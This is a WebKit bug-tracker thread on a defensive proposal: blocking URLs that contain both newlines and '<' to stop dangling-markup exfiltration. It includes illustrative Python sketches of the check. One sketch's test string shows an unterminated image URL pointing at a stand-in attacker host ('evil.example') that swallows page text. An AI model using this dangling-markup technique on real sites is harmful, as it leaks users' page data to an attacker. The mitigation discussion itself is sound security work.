172748 – Consider blocking requests to HTTP(S) URLs that contain both `\n` and `<` characters.

https://bugs.webkit.org/show_bug.cgi?id=172748

Mike West

Reported 2017-05-31 06:29:01 PDT

In the hopes of mitigating one form of dangling-markup-based exfiltration, Blink plans to block requests whose URLs contain both removable whitespace (`\n`, `\r`, `\t`) _and_ raw less-than (`<`) characters. https://github.com/whatwg/fetch/issues/546 lays out the strategy and justification in more detail. Proposed patches to URL and Fetch are up for review at https://github.com/whatwg/url/pull/284 and https://github.com/whatwg/fetch/pull/519 respectively, and Blink's "Intent to Remove" might be helpful: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ. CCing achristensen@, who's had helpful comments on the URL patch, though I don't think they're in favor of the exact implementation strategy outlined there. :) WDYT?
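For readers skimming the thread, the proposed check can be sketched roughly as follows. This is an illustration only, not Blink's or WebKit's code: the function names `looks_like_dangling_markup` and `should_block` are hypothetical, and the sketch assumes the caller already knows the scheme of the resolved URL and still has the raw, unparsed URL string at hand.

```python
# Hypothetical sketch of the proposed check; names are illustrative only.

# The "removable whitespace" characters named in the report.
REMOVABLE_WHITESPACE = ("\n", "\r", "\t")


def looks_like_dangling_markup(raw_url: str) -> bool:
    """True if the raw URL string has removable whitespace AND a raw '<'."""
    has_whitespace = any(ch in raw_url for ch in REMOVABLE_WHITESPACE)
    return has_whitespace and "<" in raw_url


def should_block(raw_url: str, resolved_scheme: str) -> bool:
    """Apply the check only to HTTP(S) requests, as the bug title suggests.

    Assumption: resolved_scheme is the scheme of the URL after resolution
    against the base URL, supplied by the caller.
    """
    is_http = resolved_scheme.lower() in ("http", "https")
    return is_http and looks_like_dangling_markup(raw_url)


# An unterminated attribute such as <img src='https://evil.example/?
# swallows the markup that follows it, newline included.
leaky = "https://evil.example/?\n<p>secret</p>"
print(should_block(leaky, "https"))                      # True
print(should_block("https://example.com/a<b", "https"))  # False
print(should_block("https://example.com/a\nb", "https")) # False
```

Either character on its own is left alone; only the combination is treated as a sign of swallowed markup.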

Alex Christensen

Comment 1 2017-05-31 10:57:21 PDT

As outlined in https://github.com/whatwg/url/pull/284 I am very opposed to this approach to mitigating the problem. Please don't do this in Chromium or the specifications.

Mike West

Comment 2 2017-05-31 22:57:21 PDT

Hey Alex! My understanding from your comments in the patch against URL (particularly https://github.com/whatwg/url/pull/284#issuecomment-304087641) is that you're not opposed to the behavior itself, but to implementing it by patching URL rather than HTML. Is that not accurate?

Alex Christensen

Comment 3 2019-09-13 08:57:20 PDT

URLs are used in a lot of places that aren't vulnerable to dangling markup attacks, so it definitely shouldn't go in the URL parser or specification. HTML is a more appropriate place because you're trying to avoid URLs that look like HTML, and URLs should not need to know anything about HTML. That said, I'm worried about compatibility. I'm under the impression that hand-written URLs sometimes contain tabs, newlines, < and > for good reasons, but I have no data to back that up.

Mike West

Comment 4 2019-10-08 11:50:54 PDT

> URLs are used in a lot of places that aren't vulnerable to dangling markup attacks,
> so it definitely shouldn't go in the URL parser or specification. HTML is a more
> appropriate place because you're trying to avoid URLs that look like HTML, and URLs
> should not need to know anything about HTML.

It's totally possible to implement this outside the URL parser. In Chromium, it's implemented as a flag that the URL parser sets during parsing (https://cs.chromium.org/chromium/src/url/url_canon_etc.cc?rcl=2bd9bea1c6b9ace95707a0e8715f40793c9dc909&l=26). We're scanning the URL anyway at that point to remove whitespace, and scanning the string prior to canonicalizing it turned out to show up in benchmarks. There is likely a clever way to avoid that performance impact, but it's what Chromium is doing today.

From a spec perspective, I'd be fine with this all living in HTML, with the caveat that it seems like a large amount of work to go through that spec to find all the places where URLs could be parsed and wire them up to some parsing proxy. I don't have time right now to do that work. :(

> That said, I'm worried about compatibility. I'm under the impression that hand
> written URLs sometimes contain tabs, newlines, < and > for good reasons, but I
> have no data to back that up.

FWIW, Chrome has been shipping this behavior since 2017.
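The single-pass idea described in this comment (record a flag while the parser is already walking the string to remove whitespace, instead of scanning it a second time) might look something like the sketch below. It is not a transcription of the linked Chromium source: the function name `remove_url_whitespace` and the shape of its return value are assumptions made for illustration.

```python
from typing import Tuple

# Characters the URL parser strips from its input.
REMOVABLE_WHITESPACE = frozenset("\n\r\t")


def remove_url_whitespace(raw: str) -> Tuple[str, bool]:
    """Strip removable whitespace and report possible dangling markup.

    Returns (cleaned_url, potentially_dangling_markup). The flag is computed
    in the same loop that removes whitespace, so no extra scan is needed.
    """
    kept = []
    saw_whitespace = False
    saw_less_than = False
    for ch in raw:
        if ch in REMOVABLE_WHITESPACE:
            saw_whitespace = True
            continue  # drop the character, as the parser would anyway
        if ch == "<":
            saw_less_than = True
        kept.append(ch)
    return "".join(kept), saw_whitespace and saw_less_than


cleaned, flagged = remove_url_whitespace("https://a.example/?\n<p>x")
print(cleaned)  # https://a.example/?<p>x
print(flagged)  # True
```

A caller outside the URL parser (for example, the fetch or HTML layer) could then decide whether to act on the flag, which keeps the blocking policy itself out of URL parsing.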

Simon Pieters (:zcorpan)

Comment 5 2024-05-30 04:26:16 PDT

The current proposal is https://github.com/whatwg/html/pull/10022

Status NEW

Priority P2

Severity Enhancement

Classification Unclassified

Version WebKit Nightly Build

Hardware All

OS All

Product WebKit

Component WebCore Misc.

Assignee Nobody

Reported 2017-05-31 06:29 PDT

Modified 2024-05-30 10:54 PDT

CC List 7 users